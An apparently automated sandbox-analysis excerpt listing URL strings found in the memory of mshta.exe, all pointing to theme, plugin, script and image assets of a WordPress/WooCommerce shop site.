Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.range
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/plugins/tooltipst
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/tooltipster.bundl
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/tooltip/js/tooltipster.bundle
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5.6
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/password-strength-meter.min.j
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.6.2
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?v
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-w
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.57
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5;
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5?ver=2.3.73.8
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5C:
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5mart
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5C:
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5N
Source: mshta.exe, 00000003.00000002.2953230766.0000018407710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5b
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5e.css?ver=2.3.7
Source: mshta.exe, 00000003.00000002.2953230766.0000018407788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5ooQp
Source: mshta.exe, 00000003.00000002.2953230766.0000018407788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5un.r
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.17.5)
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5)
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5);
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5);css
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.57KJd
Source: mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.17.5#fl-icons)
Source: mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.17.5)
Source: mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.17.5)
Source: mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.17.5)
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.popups.js?ver=3.17.5
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.popups.js?ver=3.17.57
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.popups.js?ver=3.17.5W
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.17.5
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.17.5.5
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.17.5S
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.17.5
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.17.5O
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/flatsome.js?ver=89ac940c4841291ea8d6
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=1a392523165907adee6a
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=1a392523165907adee6aR
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/libs/infinite-scroll.pkgd.min.js?ver=4.0.1
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/inc/extensions/flatsome-infinite-scroll/flatsome-inf
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/inc/extensions/flatsome-instant-page/flatsome-instan
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/inc/extensions/flatsome-lazy-load/flatsome-lazy-load
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-se
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/cropped-logo-d-270x270.jpg
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/cropped-logo-d-270x270.jpg/
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-180x180.jpg.pagespeed.ic.5J2kHsZjY5.jpg
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-180x180.jpg.pagespeed.ic.5J2kHsZjY5.jpg/
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.j
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.jpg.pagespeed.ic.EwuWeIzKab.jpg
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.js
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.js?ve
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-32x32.jpg.pagespeed.ic.O2d9531Kcm.jpg
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xdohovir-oferty-280x280.png.pagespeed.ic.Us1ysJgC5g.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xdopomoha-280x280.png.pagespeed.ic.YLuKJA07kn.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xlogo-gurt-m.png.pagespeed.ic.SkQgjUt9Ci.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xostanni-zamovlennia-280x280.png.pagespeed.ic.y9zgyMzY4v.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xprofil-280x280.png.pagespeed.ic.A1jMtoXaMR.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xvidnovyty-parol-280x280.png.pagespeed.ic.FKw07L82hi.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xzamovlennia-280x280.png.pagespeed.ic.nWjuhwsWVe.png
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xznyzhky-280x280.png.pagespeed.ic.aW61iAx-0t.png
Source: mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=12
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1DSC:
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1F
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1P
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/js/hoverIntent.min.js?ver=1.10.2
Source: mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.000001840776B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
Source: mshta.exe, 00000003.00000002.2954468582.0000018407B2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1934399175.0000018407B2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1%
Source: mshta.exe, 00000003.00000002.2953230766.0000018407710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1-shop.css?ver=3.17.5
Source: mshta.exe, 00000003.00000002.2954352575.00000184079F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.12
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1J5
Source: mshta.exe, 00000003.00000002.2955784251.000001840C804000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1kC:
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/js/zxcvbn-async.min.js?ver=1.0
